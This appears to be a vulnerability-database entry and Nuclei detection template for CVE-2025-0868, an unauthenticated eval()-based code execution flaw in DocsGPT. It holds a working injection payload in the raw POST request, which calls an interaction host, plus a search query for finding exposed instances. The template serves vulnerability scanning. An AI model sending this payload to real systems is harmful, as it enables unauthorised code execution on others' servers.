DocsGPT - Unauthenticated Remote Code Execution

CVE-2025-0868
Verified

Description

A vulnerability, that could result in Remote Code Execution (RCE), has been found in DocsGPT. Due to improper parsing of JSON data using eval() an unauthorized attacker could send arbitrary Python code to be executed via /api/remote endpoint.This issue affects DocsGPT- from 0.8.1 through 0.12.0.

Severity

Critical

Exploit Probability

43%

Published Date

February 25, 2025

Template Author

iamnoooob, rootxharsh, pdresearch

CVE-2025-0868.yaml
id: CVE-2025-0868

info:
  name: DocsGPT - Unauthenticated Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    A vulnerability, that could result in Remote Code Execution (RCE), has been found in DocsGPT. Due to improper parsing of JSON data using eval() an unauthorized attacker could send arbitrary Python code to be executed via /api/remote endpoint.This issue affects DocsGPT- from 0.8.1 through 0.12.0.
  reference:
    - https://cert.pl/posts/2025/02/CVE-2025-0868/
    - https://cert.pl/en/posts/2025/02/CVE-2025-0868/
    - https://github.com/arc53/DocsGPT
  classification:
    epss-score: 0.42727
    epss-percentile: 0.97318
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="Welcome to DocsGPT"
  tags: cve,cve2025,docsgpt,unauth,rce,vkev,vuln

http:
  - raw:
      - |
        POST /api/remote HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user=1&source=reddit&name=other&data={"source":"reddit","client_id":"1111","client_secret":1111,"user_agent":"111","search_queries":[""],"number_posts":10,"rce\\\\":__import__('requests').get('http://{{interactsh-url}}/')}#":11}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns

      - type: word
        part: body
        words:
          - '"task_id":'
          - '"status":'
        condition: and
# digest: 4a0a00473045022100fa0c31219d4f6596a065a56f7501b16c8eb7781411b8967e4c6396164a7d4fa002200357affdbb40d063a48538afe76e0d78fe2e41648e8500804249035119e38a35:922c64590222798bb761d5b6d8e72950